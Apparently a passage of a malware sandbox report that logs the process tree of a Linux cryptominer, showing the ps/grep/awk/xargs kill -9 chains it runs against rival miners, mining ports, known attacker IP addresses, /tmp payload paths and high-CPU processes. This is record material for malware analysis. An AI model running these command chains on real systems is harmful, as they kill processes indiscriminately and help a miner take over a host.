xargs -I "%" kill -9 "%"
2⤵
PID:1693

/bin/grep
grep -v -
2⤵
PID:1692

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1691

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1690

/bin/grep
grep :23
2⤵
PID:1689

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1699

/bin/grep
grep -v -
2⤵
PID:1698

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1697

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1696

/bin/grep
grep :443
2⤵
PID:1695

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1706

/bin/grep
grep -v -
2⤵
PID:1705

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1704

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1703

/bin/grep
grep :143
2⤵
PID:1702

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1714

/bin/grep
grep -v -
2⤵
PID:1713

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1712

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1711

/bin/grep
grep :2222
2⤵
PID:1710

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1720

/bin/grep
grep -v -
2⤵
PID:1719

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1718

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1717

/bin/grep
grep :3333
2⤵
PID:1716

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1726

/bin/grep
grep -v -
2⤵
PID:1725

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1724

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1723

/bin/grep
grep :3389
2⤵
PID:1722

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1732

/bin/grep
grep -v -
2⤵
PID:1731

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1730

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1729

/bin/grep
grep :4444
2⤵
PID:1728

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1738

/bin/grep
grep -v -
2⤵
PID:1737

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1736

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1735

/bin/grep
grep :5555
2⤵
PID:1734

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1744

/bin/grep
grep -v -
2⤵
PID:1743

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1742

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1741

/bin/grep
grep :6666
2⤵
PID:1740

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1750

/bin/grep
grep -v -
2⤵
PID:1749

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1748

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1747

/bin/grep
grep :6665
2⤵
PID:1746

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1756

/bin/grep
grep -v -
2⤵
PID:1755

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1754

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1753

/bin/grep
grep :6667
2⤵
PID:1752

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1762

/bin/grep
grep -v -
2⤵
PID:1761

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1760

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1759

/bin/grep
grep :7777
2⤵
PID:1758

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1768

/bin/grep
grep -v -
2⤵
PID:1767

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1766

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1765

/bin/grep
grep :8444
2⤵
PID:1764

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1774

/bin/grep
grep -v -
2⤵
PID:1773

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1772

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1771

/bin/grep
grep :3347
2⤵
PID:1770

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1782

/bin/grep
grep -v -
2⤵
PID:1781

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1780

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1779

/bin/grep
grep :14444
2⤵
PID:1778

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1791

/bin/grep
grep -v -
2⤵
PID:1790

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1789

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1788

/bin/grep
grep :14433
2⤵
PID:1787

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1798

/bin/grep
grep -v -
2⤵
PID:1797

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1796

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1795

/bin/grep
grep :13531
2⤵
PID:1794

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1803

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1802

/bin/grep
grep -v grep
2⤵
PID:1801

/bin/grep
grep "sleep 60"
2⤵
PID:1800

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1799

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1808

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1807

/bin/grep
grep -v grep
2⤵
PID:1806

/bin/grep
grep ./crun
2⤵
PID:1805

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1804

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1813

/usr/bin/awk
awk "{if(\$3>80.0) print \$2}"
2⤵
PID:1812

/bin/grep
grep -v grep
2⤵
PID:1811

/bin/grep
grep -vw salt-minions
2⤵
PID:1810

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1809

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1818

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1817

/bin/grep
grep :3333
2⤵
PID:1816

/bin/grep
grep -v grep
2⤵
PID:1815

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1814

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1823

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1822

/bin/grep
grep :5555
2⤵
PID:1821

/bin/grep
grep -v grep
2⤵
PID:1820

/bin/ps
ps aux
2⤵
PID:1819

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1828

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1827

/bin/grep
grep "kworker -c\\"
2⤵
PID:1826

/bin/grep
grep -v grep
2⤵
PID:1825

/bin/ps
ps aux
2⤵
PID:1824

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1833

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1832

/bin/grep
grep log_
2⤵
PID:1831

/bin/grep
grep -v grep
2⤵
PID:1830

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1829

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1838

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1837

/bin/grep
grep systemten
2⤵
PID:1836

/bin/grep
grep -v grep
2⤵
PID:1835

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1834

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1843

/usr/local/sbin/kill
kill -9 14
3⤵
PID:1844

/usr/local/bin/kill
kill -9 14
3⤵
PID:1844

/usr/sbin/kill
kill -9 14
3⤵
PID:1844

/usr/bin/kill
kill -9 14
3⤵
PID:1844

/sbin/kill
kill -9 14
3⤵
PID:1844

/bin/kill
kill -9 14
3⤵
- Reads CPU attributes
PID:1844

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1842

/bin/grep
grep netns
2⤵
PID:1841

/bin/grep
grep -v grep
2⤵
PID:1840

/bin/ps
ps aux
2⤵
PID:1839

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1849

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1848

/bin/grep
grep voltuned
2⤵
PID:1847

/bin/grep
grep -v grep
2⤵
PID:1846

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1845

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1854

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1853

/bin/grep
grep darwin
2⤵
PID:1852

/bin/grep
grep -v grep
2⤵
PID:1851

/bin/ps
ps aux
2⤵
PID:1850

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1859

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1858

/bin/grep
grep /tmp/dl
2⤵
PID:1857

/bin/grep
grep -v grep
2⤵
PID:1856

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1855

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1864

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1863

/bin/grep
grep /tmp/ddg
2⤵
PID:1862

/bin/grep
grep -v grep
2⤵
PID:1861

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1860

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1869

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1868

/bin/grep
grep /tmp/pprt
2⤵
PID:1867

/bin/grep
grep -v grep
2⤵
PID:1866

/bin/ps
ps aux
2⤵
PID:1865

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1874

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1873

/bin/grep
grep /tmp/ppol
2⤵
PID:1872

/bin/grep
grep -v grep
2⤵
PID:1871

/bin/ps
ps aux
2⤵
PID:1870

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1879

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1878

/bin/grep
grep "/tmp/65ccE*"
2⤵
PID:1877

/bin/grep
grep -v grep
2⤵
PID:1876

/bin/ps
ps aux
2⤵
PID:1875

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1884

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1883

/bin/grep
grep "/tmp/jmx*"
2⤵
PID:1882

/bin/grep
grep -v grep
2⤵
PID:1881

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1880

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1889

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1888

/bin/grep
grep "/tmp/2Ne80*"
2⤵
PID:1887

/bin/grep
grep -v grep
2⤵
PID:1886

/bin/ps
ps aux
2⤵
PID:1885

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1894

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1893

/bin/grep
grep IOFoqIgyC0zmf2UR
2⤵
PID:1892

/bin/grep
grep -v grep
2⤵
PID:1891

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1890

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1899

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1898

/bin/grep
grep 45.76.122.92
2⤵
PID:1897

/bin/grep
grep -v grep
2⤵
PID:1896

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1895

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1904

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1903

/bin/grep
grep 51.38.191.178
2⤵
PID:1902

/bin/grep
grep -v grep
2⤵
PID:1901

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1900

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1909

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1908

/bin/grep
grep 51.15.56.161
2⤵
PID:1907

/bin/grep
grep -v grep
2⤵
PID:1906

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1905

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1914

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1913

/bin/grep
grep 86s.jpg
2⤵
PID:1912

/bin/grep
grep -v grep
2⤵
PID:1911

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1910

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1919

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1918

/bin/grep
grep aGTSGJJp
2⤵
PID:1917

/bin/grep
grep -v grep
2⤵
PID:1916

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1915

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1924

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1923

/bin/grep
grep nMrfmnRa
2⤵
PID:1922

/bin/grep
grep -v grep
2⤵
PID:1921

/bin/ps
ps aux
2⤵
PID:1920

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1929

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1928

/bin/grep
grep PuNY5tm2
2⤵
PID:1927

/bin/grep
grep -v grep
2⤵
PID:1926

/bin/ps
ps aux
2⤵
PID:1925

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1934

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1933

/bin/grep
grep I0r8Jyyt
2⤵
PID:1932

/bin/grep
grep -v grep
2⤵
PID:1931

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1930

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1939

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1938

/bin/grep
grep AgdgACUD
2⤵
PID:1937

/bin/grep
grep -v grep
2⤵
PID:1936

/bin/ps
ps aux
2⤵
PID:1935

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1944

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1943

/bin/grep
grep uiZvwxG8
2⤵
PID:1942

/bin/grep
grep -v grep
2⤵
PID:1941

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1940

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1949

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1948

/bin/grep
grep hahwNEdB
2⤵
PID:1947

/bin/grep
grep -v grep
2⤵
PID:1946

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1945

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1954

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1953

/bin/grep
grep BtwXn5qH
2⤵
PID:1952

/bin/grep
grep -v grep
2⤵
PID:1951

/bin/ps
ps aux
2⤵
PID:1950

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1959

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1958

/bin/grep
grep 3XEzey2T
2⤵
PID:1957

/bin/grep
grep -v grep
2⤵
PID:1956

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1955

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1964

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1963

/bin/grep
grep t2tKrCSZ
2⤵
PID:1962

/bin/grep
grep -v grep
2⤵
PID:1961

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1960

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1969

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1968

/bin/grep
grep HD7fcBgg
2⤵
PID:1967

/bin/grep
grep -v grep
2⤵
PID:1966

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1965

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1974

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1973

/bin/grep
grep zXcDajSs
2⤵
PID:1972

/bin/grep
grep -v grep
2⤵
PID:1971

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1970

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1979

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1978

/bin/grep
grep 3lmigMo
2⤵
PID:1977

/bin/grep
grep -v grep
2⤵
PID:1976

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1975

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1984

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1983

/bin/grep
grep AkMK4A2
2⤵
PID:1982

/bin/grep
grep -v grep
2⤵
PID:1981

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1980

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1989

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1988

/bin/grep
grep AJ2AkKe
2⤵
PID:1987

/bin/grep
grep -v grep
2⤵
PID:1986

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1985

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1994

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1993

/bin/grep
grep HiPxCJRS
2⤵
- System Network Configuration Discovery
PID:1992

/bin/grep
grep -v grep
2⤵
PID:1991

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1990

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1999

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1998

/bin/grep
grep http_0xCC030
2⤵
PID:1997

/bin/grep
grep -v grep
2⤵
PID:1996

/bin/ps
ps aux
2⤵
PID:1995

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2004

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2003

/bin/grep
grep http_0xCC031
2⤵
PID:2002

/bin/grep
grep -v grep
2⤵
PID:2001

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2000

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2009

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2008

/bin/grep
grep http_0xCC032
2⤵
PID:2007

/bin/grep
grep -v grep
2⤵
PID:2006

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2005

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2014

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2013

/bin/grep
grep http_0xCC033
2⤵
PID:2012

/bin/grep
grep -v grep
2⤵
PID:2011

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2010

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2019

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2018

/bin/grep
grep C4iLM4L
2⤵
PID:2017

/bin/grep
grep -v grep
2⤵
PID:2016

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2015

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2024

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2023

/bin/grep
grep aziplcr72qjhzvin
2⤵
- System Network Configuration Discovery
PID:2022

/bin/grep
grep -v grep
2⤵
PID:2021

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2020

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2028

/usr/bin/awk
awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
2⤵
PID:2027

/bin/grep
grep -v grep
2⤵
PID:2026

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2025

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2033

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2032

/bin/grep
grep /boot/vmlinuz
2⤵
PID:2031

/bin/grep
grep -v grep
2⤵
PID:2030

/bin/ps
ps aux
2⤵
PID:2029

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2038

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2037

/bin/grep
grep i4b503a52cc5
2⤵
PID:2036

/bin/grep
grep -v grep
2⤵
PID:2035

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2034

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2043

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2042

/bin/grep
grep dgqtrcst23rtdi3ldqk322j2
2⤵
PID:2041

/bin/grep
grep -v grep
2⤵
PID:2040

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2039

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2048

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2047

/bin/grep
grep 2g0uv7npuhrlatd
2⤵
PID:2046

/bin/grep
grep -v grep
2⤵
PID:2045

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2044

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2053

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2052

/bin/grep
grep nqscheduler
2⤵
PID:2051

/bin/grep
grep -v grep
2⤵
PID:2050

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2049

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2058

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2057

/bin/grep
grep rkebbwgqpl4npmm
2⤵
PID:2056

/bin/grep
grep -v grep
2⤵
PID:2055

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2054

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2064

/usr/local/sbin/kill
kill -9 1466
3⤵
PID:2065

/usr/local/bin/kill
kill -9 1466
3⤵
PID:2065

/usr/sbin/kill
kill -9 1466
3⤵
PID:2065

/usr/bin/kill
kill -9 1466
3⤵
PID:2065

/sbin/kill
kill -9 1466
3⤵
PID:2065

/bin/kill
kill -9 1466
3⤵
- Reads CPU attributes
PID:2065

/usr/bin/awk
awk "\$3>10.0{print \$2}"
2⤵
PID:2063

/bin/grep
grep "]"
2⤵
PID:2062

/bin/grep
grep -v aux
2⤵
PID:2061

/bin/grep
grep -v grep
2⤵
PID:2060

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2059

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2070

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2069

/bin/grep
grep 2fhtu70teuhtoh78jc5s
2⤵
PID:2068

/bin/grep
grep -v grep
2⤵
PID:2067

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2066

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2075

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2074

/bin/grep
grep 0kwti6ut420t
2⤵
PID:2073

/bin/grep
grep -v grep
2⤵
PID:2072

/bin/ps
ps aux
2⤵
PID:2071

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2080

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2079

/bin/grep
grep 44ct7udt0patws3agkdfqnjm
2⤵
PID:2078

/bin/grep
grep -v grep
2⤵
PID:2077

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2076

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2087

/usr/bin/awk
awk "length(\$11)>19{print \$2}"
2⤵
PID:2086

/bin/grep
grep -v _
2⤵
PID:2085

/bin/grep
grep -v -
2⤵
PID:2084

/bin/grep
grep -v /
2⤵
PID:2083

/bin/grep
grep -v grep
2⤵
PID:2082

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2081

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2092

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2091

/bin/grep
grep "\\[^"
2⤵
PID:2090

/bin/grep
grep -v grep
2⤵
PID:2089

/bin/ps
ps aux
2⤵
PID:2088

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2097

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2096

/bin/grep
grep rsync
2⤵
PID:2095

/bin/grep
grep -v grep
2⤵
PID:2094

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2093

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2102

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2101

/bin/grep
grep watchd0g
2⤵
PID:2100

/bin/grep
grep -v grep
2⤵
PID:2099

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2098

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2107

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2106

/bin/egrep
egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2105

/bin/grep
grep -v grep
2⤵
PID:2104

/usr/local/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2105

/usr/local/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2105

/usr/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2105

/usr/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2105

/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2105

/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2105

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2103

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2112

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2111

/bin/grep
grep 158.69.133.18:8220
2⤵
PID:2110

/bin/grep
grep -v grep
2⤵
PID:2109

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2108

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2117

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2116

/bin/grep
grep /tmp/java
2⤵
PID:2115

/bin/grep
grep -v grep
2⤵
PID:2114

/bin/ps
ps aux
2⤵
PID:2113

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2122

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2121

/bin/grep
grep gitee.com
2⤵
PID:2120

/bin/grep
grep -v grep
2⤵
PID:2119

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2118

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2127

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2126

/bin/grep
grep /tmp/java
2⤵
PID:2125

/bin/grep
grep -v grep
2⤵
PID:2124

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2123

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2137

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2136

/bin/grep
grep 104.248.4.162
2⤵
PID:2135

/bin/grep
grep -v grep
2⤵
PID:2134

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2133

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2144

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2143

/bin/grep
grep 89.35.39.78
2⤵
PID:2142

/bin/grep
grep -v grep
2⤵
PID:2141

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2140

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2149

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2148

/bin/grep
grep /dev/shm/z3.sh
2⤵
PID:2147

/bin/grep
grep -v grep
2⤵
PID:2146

/bin/ps
ps aux
2⤵
PID:2145

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2155

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2154

/bin/grep
grep kthrotlds
2⤵
PID:2153

/bin/grep
grep -v grep
2⤵
PID:2152

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2151

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2160

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2159

/bin/grep
grep ksoftirqds
2⤵
PID:2158

/bin/grep
grep -v grep
2⤵
PID:2157

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2156

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2165

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2164

/bin/grep
grep netdns
2⤵
PID:2163

/bin/grep
grep -v grep
2⤵
PID:2162

/bin/ps
ps aux
2⤵
PID:2161

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2170

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2169

/bin/grep
grep watchdogs
2⤵
